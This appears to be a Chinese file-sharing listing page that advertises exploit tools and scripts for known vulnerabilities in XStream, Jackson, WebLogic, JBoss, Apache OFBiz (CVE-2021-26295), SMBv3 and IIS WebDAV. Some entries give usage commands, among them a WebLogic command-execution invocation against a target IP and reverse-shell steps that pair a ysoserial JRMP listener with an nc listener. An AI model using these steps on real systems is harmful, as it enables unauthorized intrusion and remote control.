kindeditor-4.1.11-zh-CN,CVE-2017-1002024
2021-05-09 19:00:09 784KB CVE-2017-1002024
1
XStream是一个常用的Java对象和XML相互转换的工具。近日XStream官方发布安全更新,修复了XStream 反序列化漏洞(CVE-2020-26258、CVE-2020-26259)。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2020-26258 SSRF漏洞,以及 CVE-2020-26259 任意文件删除漏洞。
2021-05-08 15:03:58 615KB jar
1
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。阿里云应急响应中心提醒Jackson用户尽快采取安全措施阻止漏洞攻击。
2021-05-08 15:03:57 1.29MB jar
1
Weblogic任意命令执行的检测工具。 WebLogic_CVE-2017-3248文件夹的执行命令: java -jar weblogic_cmd.jar -C whoami -H 10.1.1.104 -P 8083 Weblogic Unserialization GetShll&CMD文件夹的执行命令: java -jar Weblogic-Unserialization-GetShll-CMD.jar 或者双击starter.bat.
2021-04-30 15:45:42 83MB Weblogic 安全漏洞
1
Jboss反序列化漏洞利用工具,CVE-2017-12149。Jboss反序列化漏洞利用工具,CVE-2017-12149。
2021-04-30 10:44:56 1.98MB JBoss
1
CVE-2021-3493利用脚本,具体参考https://blog.csdn.net/weixin_43742395/article/details/116274008
2021-04-29 22:00:09 3KB 漏洞利用
1
CVE-2021-26295 CVE-2021-26295 EXP可成功反弹壳 本文以及工具仅限于技术共享,不能用于非法用途,否则会导致一切后果自行承担。 触发命令执行EXP 1. VPS启动RMI监听9999端口 java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 ' [要执行的命令] ' 2. VPS启动nc监听64444端口 nc -lvp 64444 3.执行python脚本 python3 cve-2021-26295_exp.py 示例
2021-04-27 22:26:56 190KB Python
1
微软SMBv3远程代码执行漏洞(SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码)可被攻击者利用,实现无须权限即可执行远程代码,受攻击的目标系统只需开机在线即可能被入侵。该漏洞后果十分接近永恒之蓝系列,存在被WannaCry等勒索蠕虫利用的可能,攻击者可以构造特定的网页、压缩包、共享目录、Offic文档等多种方式触发漏洞进行攻击,对存在该漏洞的Windows主机造成严重威胁。
2021-04-27 09:17:43 5KB CVE-2020-0796 CVE-2020-0796-PO SMBv3协议
1
IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)-附件资源
2021-04-26 22:30:19 106B
1
openssh-8.4p1.tar.gz openssl-1.1.1g.tar.gz zlib-1.2.11.tar.gz 操作命令.txt
2021-04-26 15:04:52 11.56MB OpenSSH openssh-8.4
1